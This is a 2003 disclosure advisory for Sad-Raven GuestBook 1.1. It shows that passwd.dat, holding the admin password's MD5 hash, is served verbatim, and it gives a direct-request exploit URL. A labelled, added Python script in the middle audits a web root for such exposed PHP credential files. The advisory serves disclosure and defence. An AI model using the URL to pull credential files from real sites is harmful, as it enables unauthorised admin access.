Sad-Raven GuestBook Admin access
Date: 2003-03-22

Author : subj - r2subj3ct@dwclan.org

Product : Sad-Raven GuestBook
Version : 1.1
WebSite : http://www.sad-raven.ru
Problem : Admin access

Description:
------------


Looking at the file admin.php, one can see the following lines:

admin.php
=========
[...]

if (file_exists("passwd.dat") && $QUERY_STRING != ""):
require ("passwd.dat");
[...]
=========

These lines show that the admin password is kept in the file passwd.dat. The password is
stored there as an MD5 hash, which then only needs to be cracked.

passwd.dat
==========
<?php $Password['adm'] = "ecfa432505189a58be30f49f32b44026"; ?>
==========
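The root cause is that passwd.dat holds PHP source under an extension the web server never hands to the PHP interpreter, so a direct request returns the file verbatim, hash included. The audit script below is an added example (not part of the advisory or of Sad-Raven GuestBook): it walks a document root and flags files that contain a PHP open tag but carry a non-PHP extension, marking those that also hold a credential-like variable. It assumes a mod_php-style setup where only the listed extensions are executed, and it builds a constructed copy of the advisory's guestbook layout in a temporary directory.

```python
"""Audit a web document root for PHP source kept under an extension the web
server does not hand to the PHP interpreter (e.g. passwd.dat). Such files are
served verbatim, so any credential stored in them is exposed to any visitor."""
import os
import re
import tempfile

# Extensions executed as PHP (assumption: a typical Apache + mod_php setup).
PHP_EXTENSIONS = {".php", ".php3", ".php4", ".phtml"}
# Variable names that suggest credential material inside the source.
SECRET_PATTERN = re.compile(r"\$(password|passwd|pass|pwd)\b", re.IGNORECASE)


def audit_webroot(root):
    """Return sorted [(relative_path, reason)] for every file under `root`
    that contains a PHP open tag but has a non-PHP extension."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if os.path.splitext(name)[1].lower() in PHP_EXTENSIONS:
                continue  # the interpreter runs it; source is not served raw
            with open(path, "rb") as fh:
                head = fh.read(4096).decode("utf-8", errors="replace")
            if "<?php" not in head:
                continue
            reason = "PHP source served as a static file"
            if SECRET_PATTERN.search(head):
                reason += "; contains a credential-like variable"
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            findings.append((rel, reason))
    return sorted(findings)


def demo():
    """Build a constructed web root mirroring the advisory's layout and audit it."""
    root = tempfile.mkdtemp()
    gb = os.path.join(root, "guestbook")
    os.makedirs(gb)
    # Constructed copy of the leaked file from the advisory.
    with open(os.path.join(gb, "passwd.dat"), "w") as fh:
        fh.write('<?php $Password[\'adm\'] = "ecfa432505189a58be30f49f32b44026"; ?>')
    # The including script itself has a .php extension and is therefore not flagged.
    with open(os.path.join(gb, "admin.php"), "w") as fh:
        fh.write('<?php if (file_exists("passwd.dat") && $QUERY_STRING != ""): '
                 'require("passwd.dat"); endif; ?>')
    return audit_webroot(root)
```

Run `demo()` to see the single finding for guestbook/passwd.dat; point `audit_webroot()` at a real document root to check an installation.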


Exploit:
--------

http://[somehost]/guestbook/passwd.dat